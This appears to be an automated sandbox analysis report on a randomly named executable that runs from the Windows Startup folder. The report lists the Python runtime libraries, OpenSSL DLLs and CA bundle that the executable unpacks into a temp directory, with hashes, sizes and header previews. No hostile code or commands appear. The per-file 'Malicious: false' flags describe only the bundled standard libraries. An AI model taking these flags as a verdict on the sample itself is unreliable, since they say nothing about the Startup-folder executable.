SSDEEP:	768:0k+cae6rjp5MoNOfZIAQUM5YiSyvjAMxkEKu:5vSjgoNOfZIAQU27SyLxv
MD5:	F3ECA4F0B2C6C17ACE348E06042981A4
SHA1:	EB694DDA8FF2FE4CCAE876DC0515A8EFEC40E20E
SHA-256:	FB57EE6ADF6E7B11451B6920DDD2FB943DCD9561C9EAE64FDDA27C7ED0BC1B04
SHA-512:	604593460666045CA48F63D4B14FA250F9C4B9E5C7E228CC9202E7692C125AACB0018B89FAA562A4197692A9BC3D2382F9E085B305272EE0A39264A2A0F53B75
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z2.\.Sa..Sa..Sa..+...Sa..,`..Sa..,d..Sa..,e..Sa..,b..Sa.$.`..Sa.U+`..Sa..S`.USa.$.l..Sa.$.a..Sa.$...Sa.$.c..Sa.Rich.Sa.........PE..d......e.........." ...%.....8.......................................................I....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..8............................text...(........................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83224
Entropy (8bit):	6.338326324626716
Encrypted:	false
SSDEEP:	1536:MUuhDLiJfz76Xl+1ly+uCt9/s+S+pzcHS58/n1IsJHfsZIALwqw7Syraxi:MU6DL4fHdy+uCt9/sT+pzuSQ1IwHfsZS
MD5:	9C6283CC17F9D86106B706EC4EA77356
SHA1:	AF4F2F52CE6122F340E5EA1F021F98B1FFD6D5B6
SHA-256:	5CC62AAC52EDF87916DEB4EBBAD9ABB58A6A3565B32E7544F672ACA305C38027
SHA-512:	11FD6F570DD78F8FF00BE645E47472A96DAFFA3253E8BD29183BCCDE3F0746F7E436A106E9A68C57CC05B80A112365441D06CC719D51C906703B428A32C93124
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|../8z.\|8z.\|8z.\|1.T\|>z.\|-..}:z.\|-..}5z.\|-..}0z.\|-..};z.\|...}:z.\|8z.\|.z.\|s..}1z.\|...}9z.\|...}9z.\|..8\|9z.\|...}9z.\|Rich8z.\|........PE..d......e.........." ...%.v...........-.......................................`............`.............................................P............@.......0.........../...P..........T...............................@............................................text....u.......v.................. ..`.rdata...x.......z...z..............@..@.data...H...........................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_sqlite3.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	124696
Entropy (8bit):	6.266006891462829
Encrypted:	false
SSDEEP:	3072:9PfqZRAWgyjwzCO4w5y3DUfUK8PtIAOQMo:oAWgKw2C5iSUv1
MD5:	506B13DD3D5892B16857E3E3B8A95AFB
SHA1:	42E654B36F1C79000084599D49B862E4E23D75FF
SHA-256:	04F645A32B0C58760CC6C71D09224FE90E50409EF5C81D69C85D151DFE65AFF9
SHA-512:	A94F0E9F2212E0B89EB0B5C64598B18AF71B59E1297F0F6475FA4674AE56780B1E586B5EB952C8C9FEBAD38C28AFD784273BBF56645DB2C405AFAE6F472FB65C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................}........................:...................:......:......:......:.....Rich...................PE..d.....e.........." ...%.............................................................d....`.........................................`o..P....o..................8......../.......... ...T...............................@............................................text............................... ..`.rdata..............................@..@.data...8............\|..............@....pdata..8...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	177432
Entropy (8bit):	5.976892131161338
Encrypted:	false
SSDEEP:	3072:1CRW4ljuyKK8vZktW5No6XfJN54eNWXvM4VRJNI7IM/cbP7RHs3FJZ1IAC7+y:1mfEyKKaZo6XfJ2MSV+JZW
MD5:	DDB21BD1ACDE4264754C49842DE7EBC9
SHA1:	80252D0E35568E68DED68242D76F2A5D7E00001E
SHA-256:	72BB15CD8C14BA008A52D23CDCFC851A9A4BDE13DEEE302A5667C8AD60F94A57
SHA-512:	464520ECD1587F5CEDE6219FAAC2C903EE41D0E920BF3C9C270A544B040169DCD17A4E27F6826F480D4021077AB39A6CBBD35EBB3D71672EBB412023BC9E182A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........wfj...9...9...9.n.9...9.i.8...9.i.8...9.i.8...9.i.8...9...8...9...9U..9.n.8...9...8...9...8...9...9...9...8...9Rich...9........PE..d.....e.........." ...%............\,..............................................t.....`......................................... ...d.......................8......../......x...@...T...............................@............................................text.............................. ..`.rdata...!......."..................@..@.data...(...........................@....pdata..8............^..............@..@.rsrc................j..............@..@.reloc..x............t..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_uuid.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25368
Entropy (8bit):	6.632343774086073
Encrypted:	false
SSDEEP:	384:wfo/nEWNkiAQ1IAZw/7HQIYiSy1pCQ+KGfAM+o/8E9VF0NyHGpn:wwnERHQ1IAZwD5YiSyvtkAMxkEMn
MD5:	7A00FF38D376ABAAA1394A4080A6305B
SHA1:	D43A9E3AA3114E7FC85C851C9791E839B3A0EE13
SHA-256:	720E9B68C41C8D9157865E4DD243FB1731F627F3AF29C43250804A5995A82016
SHA-512:	CE39452DF539EEEFF390F260C062A0C902557FDA25A7BE9A58274675B82B30BDDB7737B242E525F7D501DB286F4873B901D94E1CD09AA8864F052594F4B34789
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........pjzz#jzz#jzz#c..#hzz#..{"hzz#..."fzz#..~"bzz#..y"izz#P.{"hzz#!.{"ozz#jz{#@zz#P.r"kzz#P.z"kzz#P..#kzz#P.x"kzz#Richjzz#........PE..d......e.........." ...%.....&...... ........................................p......Mr....`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\_wmi.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	6.357254511176439
Encrypted:	false
SSDEEP:	768:6cxnHG7MYGQd0hHdzA77yeu1IACis5YiSyvoAMxkE9:6cxnm7M6dAHdzA77yeu1IACiW7Sy+xx
MD5:	C1654EBEBFEEDA425EADE8B77CA96DE5
SHA1:	A4A150F1C810077B6E762F689C657227CC4FD257
SHA-256:	AA1443A715FBF84A84F39BD89707271FC11A77B597D7324CE86FC5CFA56A63A9
SHA-512:	21705B991E75EFD5E59B8431A3B19AE5FCC38A3E7F137A9D52ACD24E7F67D61758E48ABC1C9C0D4314FA02010A1886C15EAD5BCA8DCA1B1D4CCBFC3C589D342E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S..............l..............................z.......................................z.......z.......z.......z......Rich....................PE..d......e.........." ...%.(...:.......&..............................................!n....`..........................................T..H....T...............p..`....`.../......t...DG..T............................C..@............@.......S..@....................text....&.......(.................. ..`.rdata..D....@... ...,..............@..@.data........`.......L..............@....pdata..`....p.......P..............@..@.rsrc................T..............@..@.reloc..t............^..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1332263
Entropy (8bit):	5.5864676354018465
Encrypted:	false
SSDEEP:	12288:uttcY+bStOmgRF1+fYNXPh26UZWAzCu7joqYnhjHgkVHdmmPnHz1dG6sF7aYceM:uttcY+UHCiCAd+cqHdmmPHzvwaYceM
MD5:	630153AC2B37B16B8C5B0DBB69A3B9D6
SHA1:	F901CD701FE081489B45D18157B4A15C83943D9D
SHA-256:	EC4E6B8E9F6F1F4B525AF72D3A6827807C7A81978CB03DB5767028EBEA283BE2
SHA-512:	7E3A434C8DF80D32E66036D831CBD6661641C0898BD0838A07038B460261BF25B72A626DEF06D0FAA692CAF64412CA699B1FA7A848FE9D969756E097CBA39E41
Malicious:	false
Preview:	PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z..e........Z..e.e........Z+ejY............................[d...Z-..e-........

C:\Users\user\AppData\Local\Temp\_MEI56522\certifi\cacert.pem

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292541
Entropy (8bit):	6.048162209044241
Encrypted:	false
SSDEEP:	6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
MD5:	D3E74C9D33719C8AB162BAA4AE743B27
SHA1:	EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
SHA-256:	7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
SHA-512:	E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md.cp312-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.674392865869017
Encrypted:	false
SSDEEP:	96:KGUmje72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFXiHBpv9cX6gTim1qeSC:rjQ2HzzU2bRYoe1HH9cqgTimoe
MD5:	D9E0217A89D9B9D1D778F7E197E0C191
SHA1:	EC692661FCC0B89E0C3BDE1773A6168D285B4F0D
SHA-256:	ECF12E2C0A00C0ED4E2343EA956D78EED55E5A36BA49773633B2DFE7B04335C0
SHA-512:	3B788AC88C1F2D682C1721C61D223A529697C7E43280686B914467B3B39E7D6DEBAFF4C0E2F42E9DDDB28B522F37CB5A3011E91C66D911609C63509F9228133D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d....jAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	5.917175475547778
Encrypted:	false
SSDEEP:	3072:bA3W6Fck6/g5DzNa4cMy/dzpd1dhdMdJGFEr6/vD:MW6NzcMy/d13FErgvD
MD5:	BF9A9DA1CF3C98346002648C3EAE6DCF
SHA1:	DB16C09FDC1722631A7A9C465BFE173D94EB5D8B
SHA-256:	4107B1D6F11D842074A9F21323290BBE97E8EED4AA778FBC348EE09CC4FA4637
SHA-512:	7371407D12E632FC8FB031393838D36E6A1FE1E978CED36FF750D84E183CDE6DD20F75074F4597742C9F8D6F87AF12794C589D596A81B920C6C62EE2BA2E5654
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d....jAe.........." ...%.:...........<.......................................0............`.........................................@...d.......................(............ ......P...................................@............P...............................text....8.......:.................. ..`.rdata...W...P...X...>..............@..@.data...8=.......0..................@....pdata..(...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\libcrypto-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5191960
Entropy (8bit):	5.962142634441191
Encrypted:	false
SSDEEP:	98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
MD5:	E547CF6D296A88F5B1C352C116DF7C0C
SHA1:	CAFA14E0367F7C13AD140FD556F10F320A039783
SHA-256:	05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
SHA-512:	9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.\|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...\|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\libffi-8.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\libssl-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	787224
Entropy (8bit):	5.609561366841894
Encrypted:	false
SSDEEP:	12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
MD5:	19A2ABA25456181D5FB572D88AC0E73E
SHA1:	656CA8CDFC9C3A6379536E2027E93408851483DB
SHA-256:	2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
SHA-512:	DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%...........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D)......................... ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\pyexpat.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	199448
Entropy (8bit):	6.385263095268062
Encrypted:	false
SSDEEP:	3072:gP9/HQAYp/8IdzL37lqrEJesY7p7Ndrjt8HWcFwUT6ZIALhNn6:opFYp/vdzL3pqrEJ2xDrJ8DdT6A
MD5:	F179C9BDD86A2A218A5BF9F0F1CF6CD9
SHA1:	4544FB23D56CC76338E7F71F12F58C5FE89D0D76
SHA-256:	C42874E2CF034FB5034F0BE35F7592B8A96E8903218DA42E6650C504A85B37CC
SHA-512:	3464ECE5C6A0E95EF6136897B70A96C69E552D28BFEDD266F13EEC840E36EC2286A1FB8973B212317DE6FE3E93D7D7CC782EB6FC3D6A2A8F006B34F6443498DE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W,.6B..6B..6B..N..6B..IC..6B..IG..6B..IF..6B..IA..6B...C..6B..NC..6B..6C..6B...O..6B...B..6B......6B...@..6B.Rich.6B.........PE..d......e.........." ...%.............................................................)....`......................................... ...P...p............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata..D.... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\python312.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7009048
Entropy (8bit):	5.7826778751744685
Encrypted:	false
SSDEEP:	49152:mz0oCxOqKWneF3o1VLCClOTNRpaOviXEYWyb3eOYTvuFsx/iac84YNFXiTlv5WF4:mooCcqKLHX+az2Ro8Kv7HDMiEB/
MD5:	550288A078DFFC3430C08DA888E70810
SHA1:	01B1D31F37FB3FD81D893CC5E4A258E976F5884F
SHA-256:	789A42AC160CEF98F8925CB347473EEEB4E70F5513242E7FABA5139BA06EDF2D
SHA-512:	7244432FC3716F7EF27630D4E8FBC8180A2542AA97A01D44DCA260AB43966DD8AC98B6023400B0478A4809AACE1A128F1F4D6E544F2E591A5B436FD4C8A9D723
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..e...e...e...d...e.......e...`...e...a...e...f...e.......e..d...e...d...e..Bh.M.e..Be...e..B....e..Bg...e.Rich..e.........................PE..d......e.........." ...%.$)..ZB......]........................................k.....:.k...`...........................................O.d...toP......Pj.......`.dZ....j../...`j.pZ....3.T.....................I.(...P.3.@............@)..............................text....")......$)................. ..`.rdata...T'..@)..V'..().............@..@.data....?....P......~P.............@....pdata..dZ....`..\....`.............@..@PyRuntim.....@c......\b.............@....rsrc........Pj......^i.............@..@.reloc..pZ...`j..\...hi.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\pywin32_system32\pywintypes312.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	134656
Entropy (8bit):	5.9953900911096785
Encrypted:	false
SSDEEP:	3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
MD5:	26D752C8896B324FFD12827A5E4B2808
SHA1:	447979FA03F78CB7210A4E4BA365085AB2F42C22
SHA-256:	BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
SHA-512:	99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\select.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30488
Entropy (8bit):	6.582548725691534
Encrypted:	false
SSDEEP:	384:b9yLTFInPLnIdHqp3DT90IZIAQGyHQIYiSy1pCQ273bAM+o/8E9VF0Nypyn4:6inzUHqN1rZIAQGo5YiSyvUrAMxkEjh
MD5:	8A273F518973801F3C63D92AD726EC03
SHA1:	069FC26B9BD0F6EA3F9B3821AD7C812FD94B021F
SHA-256:	AF358285A7450DE6E2E5E7FF074F964D6A257FB41D9EB750146E03C7DDA503CA
SHA-512:	7FEDAE0573ECB3946EDE7D0B809A98ACAD3D4C95D6C531A40E51A31BDB035BADC9F416D8AAA26463784FF2C5E7A0CC2C793D62B5FDB2B8E9FAD357F93D3A65F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..t.s.'.s.'.s.'..7'.s.'...&.s.'...&.s.'...&.s.'...&.s.'(.&.s.'.s.'Ps.'Y..&.s.'(.&.s.'(.&.s.'(.['.s.'(.&.s.'Rich.s.'........PE..d......e.........." ...%.....2.......................................................y....`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\sqlite3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1500440
Entropy (8bit):	6.588676275246953
Encrypted:	false
SSDEEP:	24576:iTqtyGkxOc+wv05tP5kf82Hr/74YPF5o/P/gnAracr7/24UcypY7w0vpZUFv++b:hk0jwv4tP5kf8ar/74EF2/An4acrVUcc
MD5:	C1161C1CEC57C5FFF89D10B62A8E2C3A
SHA1:	C4F5DEA84A295EC3FF10307A0EA3BA8D150BE235
SHA-256:	D1FD3040ACDDF6551540C2BE6FF2E3738F7BD4DFD73F0E90A9400FF784DD15E6
SHA-512:	D545A6DC30F1D343EDF193972833C4C69498DC4EA67278C996426E092834CB6D814CE98E1636C485F9B1C47AD5C68D6F432E304CD93CEED0E1E14FEAF39B104A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SJ...+...+...+...S...+...T...+...T...+...T...+...T...+..\S...+...+...+..-....+..-....+..-.n..+..-....+..Rich.+..................PE..d......e.........." ...%............................................................M7....`..........................................d...".............................../..........P...T...............................@...............@............................text...x........................... ..`.rdata..f...........................@..@.data....G.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1137944
Entropy (8bit):	5.462202215180296
Encrypted:	false
SSDEEP:	12288:hrEHdcM6hbFCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfciFt:hrEXYCjfk7bPNfv42BN6yzUiFt
MD5:	04F35D7EEC1F6B72BAB9DAF330FD0D6B
SHA1:	ECF0C25BA7ADF7624109E2720F2B5930CD2DBA65
SHA-256:	BE942308D99CC954931FE6F48ED8CC7A57891CCBE99AAE728121BCDA1FD929AB
SHA-512:	3DA405E4C1371F4B265E744229DCC149491A112A2B7EA8E518D5945F8C259CAD15583F25592B35EC8A344E43007AE00DA9673822635EE734D32664F65C9C8D9B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K..K..K..B.q.M..^..I..^..F..^..C..^..H..qE.H.....I..K.....qE.J..qE.J..qE..J..qE..J..RichK..........................PE..d......e.........." ...%.>..........`*.......................................p............`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data...X.... ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\win32\win32api.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133632
Entropy (8bit):	5.851293297484796
Encrypted:	false
SSDEEP:	3072:bPwB2zC1vwC3XetCf5RlRVFhLaNKPRyymoh5Lm9b0e:bIB2zkvwGXetCfDlRVlPRy85Lm9
